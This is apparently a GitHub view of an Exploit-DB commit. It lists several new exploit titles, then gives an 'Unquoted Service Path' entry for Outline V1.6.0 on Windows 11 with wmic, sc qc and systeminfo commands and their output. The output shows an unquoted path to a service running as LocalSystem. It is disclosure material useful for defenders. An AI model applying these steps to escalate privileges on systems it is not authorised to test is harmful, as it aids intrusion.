564d2ddf47
13 changes to exploits/shellcodes/ghdb DSL-124 Wireless N300 ADSL2+ - Backup File Disclosure Uniview NVR301-04S2-P4 - Reflected Cross-Site Scripting (XSS) Book Store Management System 1.0.0 - Stored Cross-Site Scripting (XSS) Helmet Store Showroom v1.0 - SQL Injection Human Resource Management System 1.0 - SQL Injection (unauthenticated) Revenue Collection System v1.0 - Remote Code Execution (RCE) WP All Import v3.6.7 - Remote Code Execution (RCE) (Authenticated) Outline V1.6.0 - Unquoted Service Path Inbit Messenger v4.9.0 - Unauthenticated Remote Command Execution (RCE) Inbit Messenger v4.9.0 - Unauthenticated Remote SEH Overflow Internet Download Manager v6.41 Build 3 - Remote Code Execution (RCE)
35 lines
No EOL
1.3 KiB
Text
35 lines
No EOL
1.3 KiB
Text
# Exploit Title: Outline V1.6.0 - Unquoted Service Path
|
||
# Exploit Author: Milad Karimi (Ex3ptionaL)
|
||
# Discovery Date: 2022-11-10
|
||
# Vendor Homepage: https://getoutline.org/
|
||
# Software Link: https://getoutline.org/
|
||
# Tested Version: V1.6.0
|
||
# Vulnerability Type: Unquoted Service Path
|
||
# Tested on OS: Microsoft Windows 11 Enterprise
|
||
# Step to discover Unquoted Service Path:
|
||
|
||
C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
|
||
|
||
Outline Updater OutlineServiceSvc C:\Program Files (x86)\Outline\OutlineService.exe
|
||
Auto
|
||
|
||
C:\>sc qc OutlineService
|
||
[SC] QueryServiceConfig SUCCESS
|
||
|
||
SERVICE_NAME: OutlineService
|
||
TYPE : 10 WIN32_OWN_PROCESS
|
||
START_TYPE : 2 AUTO_START
|
||
ERROR_CONTROL : 1 NORMAL
|
||
BINARY_PATH_NAME : C:\Program Files (x86)\Outline\OutlineService.exe
|
||
|
||
LOAD_ORDER_GROUP :
|
||
TAG : 0
|
||
DISPLAY_NAME : OutlineService
|
||
DEPENDENCIES :
|
||
SERVICE_START_NAME : LocalSystem
|
||
|
||
C:\>systeminfo
|
||
|
||
OS Name: Microsoft Windows 11 Enterprise
|
||
OS Version: 10.0.22000 N/A Build 22000
|
||
OS Manufacturer: Microsoft Corporation |